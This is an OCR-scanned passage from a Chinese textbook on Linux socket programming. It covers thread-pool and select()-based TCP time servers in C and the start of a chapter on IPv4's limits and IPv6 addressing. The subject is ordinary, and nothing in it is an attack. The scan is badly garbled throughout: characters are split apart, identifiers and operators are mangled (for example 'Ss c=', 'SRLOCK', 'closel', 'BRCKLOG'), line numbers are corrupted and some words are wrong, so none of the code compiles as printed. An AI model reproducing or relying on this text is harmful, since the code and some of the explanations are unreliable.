服务 器 处 理 包 含 了 接受 客户 端 请 求 的 信息 recv()、 对 请 求 信息 的 判断 、 发 送 客户 端 请 求 的 
响应 send0、 关 闭 客户 端 连接 的 过 程 ; 接受 客户 端 连接 accept0 作 为 一 个 过 程 由 主 程序 进行 
统一 处 理 。 这 样 ， 程 序 从 总 体 上 看 是 一 个 任务 分 配 的 过 程 : 主 程序 接受 任务 并 进行 任务 分 
发 ， 分 又 出 来 的 进程 处 理 主 程序 分 发 来 的 客户 端 请 求 任务 并 进行 处 理 和 响应 ， 最 后 的 连接 
关闭 在 处 理 程序 中 进行 。 

同 14.3.2 节 中 的 多 线程 初始 方式 不 同 , 本 例 中 的 acceptO 在 同一 个 线程 中 。 主 程序 先 建 
立 多 个 处 理 线程 ， 然 后 等 待 线程 的 结束 ， 在 多 个 线程 中 对 客户 端的 请 求 进行 处 理 。 处 理 过 
程 包含 接收 客户 端的 连接 、 接 受 客户 端的 数据 、 分 析 数 据 、 发 送 响应 等 过 程 。 

与 前 面 的 统一 accept(O) 的 线程 处 理 方式 不 同 ， 这 里 采用 多 个 线程 独立 accept()。 为 了 不 
在 多 个 线程 之 间 造 成 accept() 的 竞争 ， 使 用 了 一 个 互 斥 进行 了 acceptO 的 锁定 ， 每 次 仅仅 允 
许 一 个 线程 进行 accept() 处 理 。 其 他 的 线程 在 不 能 获得 互 斥 区 控制 权 的 情况 下 ， 不 能 进行 
accept() 的 处 理 。 

互 斥 区 保护 的 仅仅 是 accept(), 其 他 的 处 理 不 在 互 斥 区 的 保护 范围 内 ,例如 数据 的 接收 、 
处 理 、 发 送 响应 等 ， 这 是 因为 要 尽快 地 释放 互 斥 允 许 其 他 线程 进入 ， 保 证 系统 资源 的 合理 
应 用 。 服 务 器 代码 如 下 ， 其 客户 端 与 之 前 的 TCP 客户 端 一 样 。 

01 #include <sys/types.h> 

02 #include <sys/socket.h> 

03 #include <netinet/in.h> 

04 #include <time.h> 

05 #include <string.h> 

06 #include <stdio.h> 

07 #include <unistd.h> 

08 #include <pthread.h> 

09 #define BUFFLEN 1024 

10 #define SERVER PORT 8888 


11 #define BACKLOG 5 


12 #define CLIENTNUM 2 
13 /* 互 斥 量 */ 
14 pthread mutex t ALOCK = PTHREAD MUTEX INITIALIZER; 


15 static void *handle request (void *argv) 


i6 

17 int srs = *((int*)argo)s 

18 ES /* 客 户 端 套 接 字 文件 描述 符 */ 
19 struct sockaddr in from; /* 客 户 端 地 址 */ 

20 socklen t len = sizeof (from); 

bb for(;;) 

G4 { 

23 time t now; /* 时 间 */ 

24 char buff[BUFFLEN]; /* 收 发 数据 缓冲 区 */ 
25 int n= 0; 

26 

27 Pthread mutex lock (SRLOCK) : /* 进 入 互 斥 区 */ 

28 Ss c= accept(s s, (struct sockaddr*) gfrom, &len); 
29 /* 接 收 客户 端的 请 求 */ 

30 Pthread mutex unlock (&ALOCK); /* 离 开 互 斥 区 */ 

3 

32 memset (buff, 0, BUFFLEN); /* 清 零 */ 

33 n= recv(s c, buff, BUFFLEN,0); /* 接 收发 送 方 数据 */ 
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34 if(n > 0 && !strncmp (buff，"TIME"，4)) /* 判 断 是 否 合法 接收 数据 */ 
EE { 

36 memset (buff, 0, BUFFLEN); /* 清 零 */ 

37 now = time (NULL); /* 当 前 时 间 */ 

38 sprintf (buff, "$24s\r\n",ctime (&now) ) ; /* 将 时 间 复 制 入 缓冲 区 */ 
39 send(s_c，buff，strlen (buff),0); ”/* 发 送 数 据 */ 

40 } 

41 /* 关 闭 客户 端 */ 

42 closel(ls c); 

43 } 

44 

45 return NULL; 

46 } 

47 static void handle connect (int s) 

48 { 

49 int s s= 5; 

50 Pthread t thread do[CLIENTNUM]; /* 线 程 ID* / 

四 下 nt d= 0 

52 for (i=0;i<CLIENTNUM;i++) /* 建 立 线程 池 */ 
53 Le 

54 /* 创 建 线程 */ 

55 pthread create (&thread do[i], /* 线 程 ID* / 

56 NULL, /* 属 性 */ 

57 handle request, /* 线 程 回 调 函 数 */ 
58 (void*)&s s); /* 线 程 参 数 */ 

59 } 

60 /* 等 待 线程 结束 */ 

61 for (i=0;i<CLIENTNUM; i++) 

62 pthread join(thread do[i], NULL); 

不 | 

64 int main(int argc, char *argv[]) 

65. 4 

66 DERSES5 /* 服 务 器 套 接 字 文件 描述 符 */ 
67 struct sockaddr in local; /* 本 地 地 址 */ 

68 

69 /* 建 立 TCP 套 接 字 */ 

70 ss = socket(AF INET, SOCK STREAM, 0); 

TL 

72 /* 初 始 化 地 址 和 端口 */ 

73 memset (&local, 0, sizeof (local)); /* 清 零 */ 

74 local.sin family = AF_INET; /*AF_INET 协议 族 */ 
5 local.sin addr.s_addr = htonl (INADDR_ANY) ; /* 任 意 本 地 地 址 */ 
76 local.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 
2 

78 /* 将 套 接 字 文 件 描述 符 绑 定 到 本 地 地 址 和 端口 */ 

79 bind(s_s， (struct sockaddr*)&local, sizeof (local)); 

80 listen(s_s，BRCKLOG) ; /* 侦 听 */ 

81 

82 /* 处 理 客户 端 连接 */ 

83 handle connect(s s); 

84 

85 close(s 3); /* 关 闭 套 接 字 */ 
86 

87 return 0; 

88 } 
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14.4 IO 复 用 循环 服务 器 


前 面 介绍 的 内 容 主要 集中 在 并 发 服务 器 上 。 并 发 服务 器 有 一 个 比较 重大 的 缺陷 ， 它 需 
要 建立 多 个 并 行 的 处 理 单 元 。 当 客户 端 增加 时 ， 随 着 处 理 单元 的 增加 ， 系 统 的 负载 会 逐渐 
地 转移 到 并 行 单元 的 现场 切换 上 ， 这 在 嵌入 式 系统 中 特别 明显 。 
因此 ， 为 了 降低 系统 切换 的 不 必要 的 开支 ， 将 主要 的 系统 处 理 能 力 集中 在 核心 的 业务 
上 ， 需 要 降低 并 发 处 理 单元 的 数量 ， 因 此 有 了 一 个 比较 新 型 的 IO 复 用 循环 服务 器 。 

这 种 服务 器 模型 ， 在 系统 开始 的 时 候 ， 建 立 多 个 不 同 工 作 类 型 的 处 理 单元 ， 例 如 处 理 
连接 的 单元 、 处 理 业务 的 单元 等 。 在 客户 端 连接 到 来 的 时 候 ， 将 客户 端的 连接 放 到 一 个 状 
态 池 中 ， 对 所 有 客户 端的 连接 状态 在 一 个 处 理 单元 中 进行 轮 询 处 理 。 与 前 面 的 并 发 服务 器 
相 比 ,客户 端的 增加 不 会 造成 系统 并 行 处 理 单元 的 增加 , 而 处 理 能 力 与 CPU 和 内 存 的 速度 
直接 相关 。 


14.4.1 IO 复 用 循环 服务 器 模型 介绍 


如 图 14.9 所 示 ， 与 通常 的 TCP 服务 器 相同 ， 这 种 服务 器 首先 要 调用 socket() 函 数 建立 
一 个 套 接 字 文件 描述 符 ， 调用 bind() 函 数 将 套 接 字 文件 描述 符 与 本 地 地 址 进行 绑 定 ， 调 用 


socket() 
. 
bind() 线程 池 
! connect 
listen() 请 求 业务 处 理 线程 
连接 业务 处 理 线程 
connect ole send 
| i 
pthread_create() accept() 
recv() 
1 
客户 
pthread_join() 端 连 
接 状 Y 
处 理 数据 
1 


图 14.9 IO 复 用 TCP 循环 服务 器 
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listen0) 函 数 设置 侦 听 的 队列 长 度 。 然 后 建立 两 个 线程 ， 一 个 用 于 处 理 客户 端的 连接 ， 另 一 
个 线程 用 于 处 理 客户 端的 请 求 。 

连接 业务 处 理 线程 接收 客户 端的 连接 ， 当 客户 端的 连接 到 来 时 ， 函 数 accept0 成 功 时 ， 
会 得 到 客户 端 连接 的 套 接 字 文 件 描述 符 ， 连 接线 程 将 客户 端的 描述 符 放 入 客户 端 连接 状态 
表 。 这 个 状态 表 与 请 求 业务 处 理 线程 共享 。 

请 求 业务 处 理 线 程 用 于 处 理 客 户 端的 业务 请 求 ， 例 如 请 求 的 分 析 、IO 数据 的 读 取 等 。 
这 个 线程 根据 连接 线程 获得 的 客户 端的 套 接 字 文件 描述 符 ， 建 立 文件 描述 符 集合 ， 使 用 
select() 函 数 对 文件 描述 符 集合 进行 超时 等 待 。 当 有 客户 端的 请 求 到 来 ， 请 求 线程 接收 客户 
端的 数据 ， 并 对 数据 进行 处 理 。 当 客户 端的 请 求 处 理 完 毕 ， 客 户 端 退出 的 时 候 请 求 业务 处 
理 线程 将 此 客户 端的 文件 描述 符 从 客户 端 连接 状态 表 中 取出 。 

从 客户 端的 处 理 流程 来 看 ， 客 户 端 先 与 连接 业务 处 理 线程 进行 连接 ， 即 connect() 与 服 
务 器 中 的 accept() 进 行 TCP 连接 的 三 次 握手 。 当 连接 成 功 后 ， 客 户 端 发 送 的 数据 被 请 求 业 
务 处 理 单元 接收 到 ， 请 求 单元 处 理 客户 的 数据 ， 并 发 送 响应 给 客户 端 。 最 后 客户 端 关闭 连 
接 的 时 候 ， 请 求 单元 更 新 客户 端的 连接 状态 。 


14.4.2 ”IO 复 用 循环 服务 器 模型 的 例子 
本 节 将 介绍 IO 复 用 循环 服务 器 模型 的 一 个 实例 ， 由 客户 端 和 服务 器 端 两 部 分 组 成 。 
1. IO 复 用 循环 服务 器 服务 端 主 程序 


IO 复 用 的 TCP 循环 服务 器 的 实例 代码 如 下 ， 其 客户 端 主 程序 与 之 前 的 TCP 客户 端 
一 致 。 


#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <time.h> 
#include <string.h> 
#include <stdio.h> 
#include <unistd.h> 
#include <pthread.h> 
#include <sys/select.h> 
#define BUFFLEN 1024 
#define SERVER PORT 8888 
#define BACKLOG 5 


#define CLIENTNUM 1024 /* 最 大 支持 客户 端 数量 * / 
int main(int argc char *argv[]) 
{ 
in ss /* 服 务 器 套 接 字 文件 描述 符 */ 
struct sockaddr in local; /* 本 地 地 址 */ 


mt dO 
memset (connect host, -1, CLIENTNUM); 


/* 建 立 TCP 套 接 字 */ 

Ss s= socket(AF INET, SOCK STREAM, 0); 

/* 初 始 化 地 址 */ 

memset (&local, 0, sizeof(local)); /* 清 零 */ 
local.sin family = AF INET; /*AF_INET 协议 族 */ 
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local.sin addr.s addr = htonl (INADDR ANY); /* 任 意 本 地 地 址 */ 
local.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 


/* 将 套 接 字 文 件 描述 符 绑 定 到 本 地 地 址 和 端口 */ 
bind(s s, (struct sockaddr*)&local, sizeof (local)); 


listen(s_s, BACKLOG); /* 侦 听 */ 


pthread t thread do[2];/* 线 程 ID*/ 


/* 创 建 线程 处 理 客户 端 连接 */ 

pthread create(&thread do[0], /* 线 程 ID*/ 
NULL, /* 属 性 */ 
handle connect, /* 线 程 回调 函数 */ 
(void*)&s_ s); /* 线 程 参 数 */ 

/* 创 建 线程 处 理 客户 端 请 求 */ 

pthread create(g&thread do[1], /* 线 程 ID*/ 
NULL, /* 属 性 */ 
handle request, /* 线 程 回调 函数 */ 
NULL) ; /* 线 程 参 数 */ 

/* 等 待 线程 结束 */ 


for (i=0;i<2;i++) 
pthread join(thread do[i], NULL); 


closel(s_s); 


return 0; 

} 

上 述 代码 为 主 程序 ， 主 程序 的 处 理 过 程 与 其 他 并 行 服务 器 基本 相同 : 先 建立 一 个 TCP 
类 型 的 套 接 字 , 然后 设置 地 址 结构 , 将 需要 绑 定 的 本 地 IP 地 址 和 服务 器 端口 号 进行 结构 复 
制 ， 绑 定 到 之 前 申请 的 套 接 字 描 述 符 上 。 

由 于 是 TCP 的 服务 器 连接 ， 因 此 对 等 待 的 队列 长 度 进行 了 设置 ， 本 例 中 支持 最 大 为 
BACKLOG=5 的 队列 ， 即 允许 等 待 队 列 长 度 为 5 的 客户 端 。 在 设置 完 套 接 字 之 后 ，IO 复 用 
的 服务 器 实现 代码 建立 了 两 个 线程 ， 一 个 是 处 理 客户 端 连接 的 线程 ， 这 个 线程 对 客户 端的 
请 求 进行 处 理 ， 另 一 个 是 处 理 客户 端 请 求 的 线程 ， 这 个 线程 对 客户 端的 请 求 进行 处 理 。 然 
后 主 程序 等 待 两 个 线程 的 结束 ， 最 后 主 程序 关闭 套 接 字 描述 符 。 


2. IO 复 用 循环 服务 器 客户 端 相关 处 理 程 序 


服务 器 端的 代码 主要 包含 客户 端 请 求 处 理 和 客户 端 连接 处 理 过 程 。 

(1) 客户 端 请 求 处 理 线程 函数 handle_request()。 下 述 代码 为 处 理 客户 端 请 求 的 线程 ， 
这 个 线程 的 主要 作用 是 使 用 IO 复 用 的 函数 select0)， 对 多 个 套 接 字 文 件 描述 符 进 行 一 定时 
间 内 的 等 待 。 如 果 等 待 的 时 间 超 时 ， 会 重新 进行 select0 的 一 系列 操作 。 

/* 可 连接 客户 端的 文件 描述 符 数 组 */ 

int connect host [CLIENTNUM]; 

int connect number = 0; 


static void *handle request (void *argv) 
‘ 


time t now; /* 时 间 */ 
char buff[BUFFLEN]; /* 收 发 数据 缓冲 区 */ 


int n= 0; 
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int maxfd = -1; /* 最 大 侦 听 文件 描述 符 * / 
fd_set scanfd; /* 侦 听 描述 符 集 合 */ 
struct timeval timeout; /* 超 时 */ 

timeout.tv sec = 1; /* 阻塞 1s 后 超时 返回 */ 
timeout.tv usec = 0; 

int i = 0; 

int err = =1; 

for(;;) 


i 
/* 最 大 文件 描述 符 值 初始 化 为 -1*/ 


maxfd = -1; 
FD _ ZERO(&scanfd); /* 清 零 文 件 描述 符 集合 */ 
for (i=0;i<CLIENTNUM; i++) /* 将 文件 描述 符 放 入 集合 */ 
{ 

if(connect host[i] != -1) /* 合 法 的 文件 描述 符 */ 


{ 
FD SET(connect host[i]，&scanfd); /* 放 入 集合 */ 
if(maxfd < connect host [i]) /* 更 新 最 大 文件 描述 符 值 */ 
{ 
maxfd = connect host[i]; 
} 
} 
# 
/*select 等 待 */ 
err = select(maxfd + 1, &scanfd, NULL, NULL, &timeout) ; 
switch (err) 


{ 


case 0: /* 超 时 */ 
break; 
case -1: /* 错 误 发 生 */ 
break; 
default: /* 有 可 读 套 接 字 文 件 描述 符 */ 
if(connect number<=0) 
break; 


for(i = 0;i<CLIENTNUM;i++) 
{ 
/* 查 找 激活 的 文件 描述 符 */ 
if(connect host[i] != -1) 
if(FD ISSET(connect host[i],é&scanfd)) 
{ 


memset (buff, 0, BUFFLEN); /* 清 零 */ 

n= recv(connect host[i], buff, BUFFLEN,0); 

/* 接 收发 送 方 数据 */ 

if(n > 0 && !strncmp (buff, "TIME", 4)) 

/* 判 断 是 否 合法 接收 数据 */ 

{ 
memset (buff，0，BUFEFLEN) ;  /* 清 零 */ 
now = time (NULL); /* 当 前 时 间 */ 
sprintf (buff, "%24s\r\n",ctime (&now) ) ; 
/* 将 时 间 复制 入 缓冲 区 */ 
send (connect_host[i]l ，buff，strlen(buff) ,0); 
/* 发 送 数据 */ 

/* 更 新 文件 描述 符 在 数组 中 的 值 */ 

connect host[i] = -1; 

connect number --; /* 客 户 端 计 数 器 减 1*/ 
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} 
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/* 关 闭 客户 端 */ 


close(connect host[i]); 


break; 


return NULL; 


程序 的 主要 过 程 如 下 所 述 。 


口 口 口 


口 


初始 化 select() 需 要 的 读 文件 描述 符 、 写 文件 描述 符 。 

将 放置 文件 描述 符 的 数组 connect_host[] 中 的 合法 文件 描述 符 放 入 select() 的 文件 描 
述 符 集合 中 , 这 里 同时 更 新 了 select 需要 设置 的 MAXFD, 设置 文件 描述 符 完毕 后 ， 
maxfd 参数 中 放置 的 为 当前 最 大 的 文件 描述 符 。 

然后 进行 select， 等 待 IO 复 用 可 用 条 件 的 满足 : 数据 到 来 或 者 超时 。 

当 select() 结 束 的 时 候 ， 先 检查 select 返回 值 的 合法 性 。 

在 select() 合 法 的 时 候 ， 根 据 connect_host[] 中 的 文件 描述 符 判 定 是 否 此 文件 描述 符 
的 数据 到 来 。 

对 于 激活 的 文件 描述 符 ， 进 行 了 之 前 的 常用 处 理 : 从 文件 描述 符 中 接收 数据 、 判 
断 接收 的 数据 中 是 否 有 TIME 关键 字 、 获 取 本 地 的 时 间 值 、 将 本 地 的 时 间 值 发 送 
给 客户 端 。 

对 于 处 理 完毕 的 文件 描述 符 设置 在 connect_host[] 中 的 标记 为 -1， 表 明 此 文件 描述 
符 已 经 处 理 过 ， 不 再 有 效 ; 然后 关闭 客户 端 连接 。 


上 述 代 码 为 IO 复 用 的 核心 代码 ， 这 个 select0 服 务 器 可 以 同时 对 大 量 的 文件 描述 符 进 
行 检测 和 处 理 ， 并 有 很 高 的 效率 。 

(2) 客户 端 连接 处 理 过 程 函 数 handle_connect()。 在 服务 器 接收 到 客户 端 连接 的 时 候 ， 
会 轮 循 进行 处 理 。 


static void *handle connect (void *argv) 


由 


int ss = *((int*)argv) ; /* 获 得 服务 器 侦 听 套 接 字 文件 描述 符 */ 
struct sockaddr in from; 
socklen t len = sizeof (from); 
/* 接 收 客户 端 连接 */ 
for(;;) 
{ 
int i = 0; 
int S_C = accept(s _s, (struct sockaddr*)g&from, &len); 
/* 接 收 客户 端的 请 求 */ 
printf ("a client connect, from:%s\n",inet ntoal(from.sin addr)); 
/* 查 找 合适 位 置 ,将 客户 端的 文件 描述 符 放 入 */ 
for (i=0;i<CLIENTNUM; i++) 
{ 
if(connect host[i] == -1) /* 找 到 */ 
{ 
TAR 


connect host[il]= s c; 
/* 客 户 端 计数 器 加 1*/ 
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connect number ++7 
/* 继 续 轮 询 等 待 客户 端 连 接 */ 
break; 
} 
) 


} 
return NULL; 
} 


上 述 代 码 是 进行 客户 端 连 接 处 理 的 线程 ， 这 个 线程 对 客户 端的 连接 进行 检测 ， 并 将 连 
接 成 功 的 客户 端 套 接 字 放 入 connect host[] 中 ， 供 客户 端 处 理 函 数 使 用 。 


14.5 小 结 


本 章 介绍 了 套 接 字 编程 中 经 常 使 用 的 模型 。 服 务 器 模型 主要 分 为 循环 服务 器 和 并 发 服 
务 器 两 种 ， 循 环 服务 器 对 客户 端的 处 理 按照 串 行 的 方式 进行 ， 处 理 完 一 个 业务 后 再 处 理 另 
一 个 业务 ; 并 发 服务 器 同时 处 理 多 个 业务 。 循 环 服务 器 又 称 为 达 代 服务 器 。 

UDP 的 服务 器 模型 比较 简单 ， 这 主要 是 由 于 它 没有 连接 和 状态 维护 ， 不 用 检查 接收 端 
是 否 收 到 数据 。TCP 的 服务 器 模型 在 并 发 服务 器 中 按照 accept() 的 前 后 情况 又 可 以 进行 不 
同 的 处 理 : 将 accept0 统 一 处 理 或 者 分 别处 理 。 可 以 根据 服务 器 业务 处 理 的 情况 进行 划分 。 

由 于 并 发 服务 器 在 使 用 多 进程 的 时 候 ， 当 客户 端 比较 多 时 ， 服 务 器 中 进程 之 间 的 切换 
造成 了 很 大 的 负载 ， 所 以 IO 复 用 的 并 发 服务 器 模型 在 嵌入 式 系统 中 或 者 资源 受 限 系统 中 
经 常 使 有 用。 例如， 使 用 Apache 的 Web 服务 器 在 受 限 系统 上 与 使 用 IO 复 用 的 shttp 服务 器 
比较 ， 性 能 就 差 了 很 多 。 在 实际 工作 中 ， 服 务 器 模型 选择 是 很 重要 的 ， 因 为 这 关系 到 框架 
是 否 合理 及 编程 处 理 是 否 方便 。 需 要 根据 情况 和 经 验 进行 慎重 地 设计 。 
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之 前 儿童 的 内 容 都 是 基于 IPv4 的 协议 进行 介绍 的 ， 由 于 IPv4 协议 了 P 地 址 的 紧张 性 ， 
目前 IPv6 协议 正在 进行 研究 并 逐步 趋 于 成 熟 。 本 章 将 介绍 IPv6 协议 相关 的 知识 ， 读 者 通 
过 本 章 的 阅读 ， 可 以 了 解 如 下 的 知识 : 

IPv4 的 缺点 和 IPv6 的 必然 性 ; 

IPv6 的 特点 ， 例 如 地 址 结构 、 即 插 即 用 、 包 头 简化 、 网 络 安全 和 服务 器 质量 等 ， 
IPv6 的 地 址 结构 ; 

IPv6 的 头 部 结构 ; 

如 何 构建 IPv6 的 运行 环境 ; 

IPv6 地 址 结构 的 代码 定义 ; 

IPv6 的 套 接 字 函数 ; 

IPv6 的 套 接 字 选 项 ; 

IPv6 的 杂项 函数 ; 

用 一 个 简单 的 例子 介绍 了 如 何 进行 IPv6 的 程序 设计 。 


OoOOOOOOOO DO 


15.1 IPv4 的 缺陷 


IPv4 的 主要 缺 隐 有 地 址 问题 、 安 全 问题 、 性 能 问题 和 自动 配置 不 够 人 性 化 等 。 这 些 问 
题 在 IPv4 的 框架 下 不 能 完全 有 效 地 进行 解决 , 仅 能 进行 个 别 问题 的 修补 ,例如 IPv4 的 NAT 
技术 用 户 尝试 性 地 解决 IP 地 址 空间 问题 只 能 获得 局 部 性 的 成 功 。 


1. IPv4 的 地 址 空间 危机 


IPv4 的 地 址 以 32 位 数值 表示 ， 最 多 可 达 40 多 亿 个 地 址 ， 如 果 人 P 地 址 是 以 递增 的 方 
式 分 配 ， 即 第 一 个 主机 为 1， 第 二 个 主机 的 地 址 为 2 的 方式 来 分 配 IP 地 址 才能 达到 预定 的 
40 亿 个 数据 。 

目前 卫 地 址 的 分 配 策略 是 按照 树 状 进行 划分 的 , 即 把 地 址 分 配给 机 构 , 然后 由 机 构 对 
IP 地 址 进行 再 次 分 配 ， 这 造成 了 IP 地 址 的 分 配 不 足 ， 总 有 部 分 IP 地 址 作为 预 留 或 者 其 他 
的 用 途 没有 分 配给 主机 。 

IP 地 址 分 为 5 类 ， 其 中 的 3 类 地 址 用 于 IP 网 络 ， 按 照 规 划 ， 这 3 类 地 址 足够 用 于 网 
络 的 构建 。 其 中 A 类 地 址 为 126 个 ， 分 给 了 最 大 的 实体 ， 例 如 政府 机 关 、 高 校 及 先入 的 企 
业 部 门 ， 主 要 分 配 在 美国 。 这 类 地 址 很 庞大 ， 但 是 由 于 历史 原因 ， 利 用 却 很 不 足 。B 类 地 
址 有 16000 个 ， 用 于 一 些 大 型 的 机 构 ， 如 大 学 和 大 公司 。C 类 地 址 数量 比较 多 ， 每 个 网 络 
上 的 主机 数量 为 255 个 ， 用 于 IP 网 络 的 其 他 机 构 。 
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由 于 A 类 地 址 的 少数 公司 并 不 能 高 效率 地 利用 IP 地 址 ， 而 获得 C 类 地 址 的 小 机 构 只 
有 几 个 主机 而 不 能 真正 使 用 此 类 地 址 ， 造 成 B 类 地 址 的 获得 越 来 越 难 。 目 前 ， 在 中 国有 多 
种 方法 来 应 对 这 种 情况 ， 例 如 NAT 技术 将 网 络 分 为 了 内 网 和 外 网 ， 除 了 安全 方面 的 考虑 ， 
主要 就 是 因为 IP 地 址 不 够 造成 的 。 而 电信 网 通 等 运营 部 门 的 动态 IP 分 配 ， 也 是 为 了 高 效 
地 利用 IP 地 址 的 方法 ， 使 得 用 户 的 了 P 可 以 多 人 多 次 使 用 。 


2. IPv4 的 性 能 


IPv4 的 设计 最 初 是 一 个 试验 品 ， 当 时 没有 考虑 到 实现 时 的 某 些 现实 情况 ， 对 目前 的 
Intemet 网 络 的 广泛 应 用 也 没有 预料 到 。 所 以 在 某 些 方面 存在 不 足 ， 例 如 最 大 传输 单元 、 最 
大 包 的 长 度 、 校 验 和 、IP 的 头 部 设计 、IP 选 路 等 都 没有 考虑 到 其 性 能 。 


3. IPv4 的 安全 


网 络 的 安全 性 能 是 目前 网 民 十 分 关心 的 问题 ， 由 于 IPv4 将 网 络 安全 放 在 了 应 用 层 考 
虑 ， 没 有 在 协议 栈 层 进行 设计 ， 存 在 很 大 的 隐患 。 

4. IPv4 的 自动 配置 和 移动 

IPv4 的 自动 配置 主要 体现 在 移动 方面 ， 在 一 个 主机 从 一 个 地 点 移动 到 新 的 地 点 的 时 
候 ， 需 要 重新 配置 ， 并 且 由 于 提供 服务 的 ISP 不 同 ， 可 能 的 配置 千差万别 ， 例 如 IP、 网 关 、 
DNS 都 要 发 生变 化 ， 甚 至 还 要 加 上 浏览 器 的 代理 出 口 。 而 原来 主机 的 所 在 位 置 ， 即 使 足够 
空闲 也 不 能 带 到 新 的 卫 紧张 的 新 地 点 。 


15.2 ”IPvV6 的 特点 


IPv6 就 是 能 够 无 限制 地 增加 IP 网 址 数量 、 拥 有 巨大 网 址 空间 和 卓越 网 络 安全 性 能 等 
特点 的 新 一 代 互联 网 协议 。IPv6 的 技术 特点 如 下 : 

口 IPv6 提供 128 位 的 地 址 空间 ， 人 全球 可 分 配 地 址 数 为 
340282366920938463463374607431768211456 个 。IPv6 的 地 址 结构 采用 128 位 的 
另 一 个 原因 是 采用 了 层次 化 的 地 址 结构 设计 ， 人 允许 对 地 址 进行 层次 化 的 划分 ， 提 
供 大 量 不 同类 型 的 IP 地 址 。 

口 IPv6 将 自动 IP 地 址 分 配 功能 作为 标准 功能 。 具有 网 络 功能 的 机 器 一 旦 连接 上 网 络 
便 可 自动 设 定 地 址 。 它 有 两 个 优点 : 一 是 最 终 用 户 用 不 着 花 精 力 进行 地 址 设 定 ， 
二 是 可 以 大 大 减轻 网 络 管理 者 的 负担 。 

口 IPv6 对 报 文 数据 报头 结构 作 了 简化 ， 用 来 减少 处 理 器 的 开销 并 节省 网 络 带 宽 。 数 
据 报 文 的 头 部 采用 了 流线型 的 设计 ，IPv6 的 报头 由 一 个 基本 报头 和 多 个 扩展 报头 
(Extension Header) 构成 ， 基 本 报头 具有 固定 的 长 度 〈40 字 节 ) ， 放 置 所 有 路 由 
器 都 需要 处 理 的 信息 。 

口 IPv6 的 安全 性 使 用 了 鉴别 和 加 密 扩 展 头 部 数据 结构 的 方法 。 作 为 IPSec 的 一 项 重 
要 应 用 ，IPv6 集成 了 虚拟 专用 网 (VPN) 的 功能 ， 使 用 IPv6 可 以 更 容易 地 实现 更 
为 安全 可 靠 的 虚拟 专用 网 。 
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口 IPv4 协议 在 设计 之 初 ， 采用 “ 尽 最 大 努力 ”传输 的 服务 质量 保证 方式 。 文 本 数据 、 
静态 图 像 数 据 等 传输 对 QoS 没有 要 求 ， 随 着 IP 网 上 多 媒体 业务 的 增加 ， 如 IP 电 
话 、VoD、 电 视 会 议 等 实时 应 用 ， 对 传输 延 时 和 延 时 抖动 均 有 严格 的 要 求 。 

口 IPv6 数据 包 包含 了 服务 质量 的 特性 ， 能 更 好 地 支持 多 媒体 和 其 他 对 服务 质量 有 较 
高 要 求 的 应 用 。 


15.3 IPv6 的 地 址 


IPv6 地 址 是 独立 接口 的 标识 符 ， 所 有 的 IPv6 地 址 都 被 分 配 到 接口 ， 而 没有 分 配 到 节 
点 。IPv6 有 以 下 3 种 类 型 地 址 。 

口 单 播 地 址 ， 这 个 地 址 是 和 IPv4 的 地 址 相对 应 的 一 个 ， 每 个 主机 接口 有 一 个 单 播 
地 址 。 

口 多 播 地 址 : 这 个 地 址 是 一 个 设备 组 的 标识 ， 发 往 这 个 地 址 的 数据 会 被 整个 设备 组 
上 的 设备 接收 到 。 

口 任 播 地 址 : 报 文 发 往 一 个 组 内 的 任意 设备 而 不 是 所 有 的 设备 。 

其 中 单 播 地 址 又 分 为 如 下 3 类 : 

口 全 局 可 聚集 单 播 地 址 ; 

口 站 点 本 地 地 址 ; 

口 链 路 本 地 地 址 。 


15.3.1 “IPv6 的 单 播 地 址 


一 个 IPv6 单 播 地 址 与 某 个 接口 相关 联 。 发 给 单 播 地 址 的 包 传送 到 由 该 地 址 标识 的 某 个 
接口 上 。 但 是 为 了 满足 负载 平衡 系统 ， 在 RFC2373 中 人 允许 多 个 接口 使 用 同一 地 址 。IPv6 
的 单 点 传送 IP 地 址 包括 : 可 聚集 全 球 单 点 传送 地 址 、 链 路 本 地 地 址 、 站 点 本 地 地 址 和 其 他 
一 些 特殊 的 单 点 传送 地 址 ， 格 式 如 表 15.1 所 示 。 

表 15.1 单 播 地 址 


单 播 地 址 子 网 前 组 接口 ID 
N 位 128-N 位 


如 果 一 个 单 播 卫 地 址 所 有 位 均 为 0， 那么 该 地 址 称 为 未 指定 的 地 址 。 以 文本 形式 表示 
为 “::”。 单 播 地 址 “::1”“0:0:0:0:0:0:0:1” 称 为 环 回 地 址 。 节 点 向 自己 发 送 数 据 包 时 采用 
环 回 地 址 。 


15.3.2 ”可 聚集 全 球 单 播 地 址 


IPv6 为 端 对 端 通信 设计 了 一 种 可 分 级 的 地 址 结构 ， 这 种 地 址 被 称 为 可 聚集 全 球 单 播 地 
址 (Aggregatable Global Unicast Address)。 可 聚集 全 球 单 播 地 址 ， 是 可 以 在 全 球 范围 内 进 
行路 由 转发 的 地 址 ， 格 式 前 级 为 001， 与 IPv4 公共 地 址 相似 。 

可 聚集 全 球 单 播 地 址 结构 如 表 15.2 所 示 。 字段 格式 前 级 FP 之 后 , 分 别 是 13 位 的 TLA 
ID、8 位 的 RES、24 位 的 NLA ID、16 位 SLA ID 和 64 位 主机 接口 ID。TLA (Top Level 
Aggregator， 顶 级 聚合 体 )、NLA (Next Level Aggregator， 下 级 聚合 体 )、SLA (Site Level 
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Aggregator， 节 点 级 聚合 体 ) 三 者 构成 了 自 顶 向 下 排列 的 3 个 网 络 层次 。 
表 15.2 可 聚集 全 局 单 播 地 址 
FP TLA ID RES NLA 1D SLA ID Interface 1D 
口 FP (Format prefix) : 格式 前 级 ， 值 为 001， 用 于 区 别 其 他 地 址 类 型 。 
口 TLA ID (Top-level Aggregation Identifier) : 顶级 聚集 标识 符 ， 是 与 长 途 服务 供应 
商 和 电话 公司 相互 连接 的 公共 上 骨干 网 络 接 入 点 ， 其 ID 的 分 配 由 国际 Internet 注册 
机 构 IANA 严格 管理 。 
口 RES (Reserved for future use) : 8 位 保留 位 ， 将 来 用 做 扩充 。 
NLA ID (Next-Level Aggregation Identifier) : 下 一 级 聚集 标识 符 。 
SLAID (Site-Level Aggregation Identifier) : 站 点 级 聚集 标识 符 ， 它 可 以 是 一 个 机 
构 或 一 个 小 型 ISP。 分 层 结构 的 最 底层 是 网 络 主机 。 
口 Interface ID :接口 标识 符 ,IPv6 单 播 地 址 中 的 接口 标识 符 用 于 在 链 路 中 标识 接口 。 


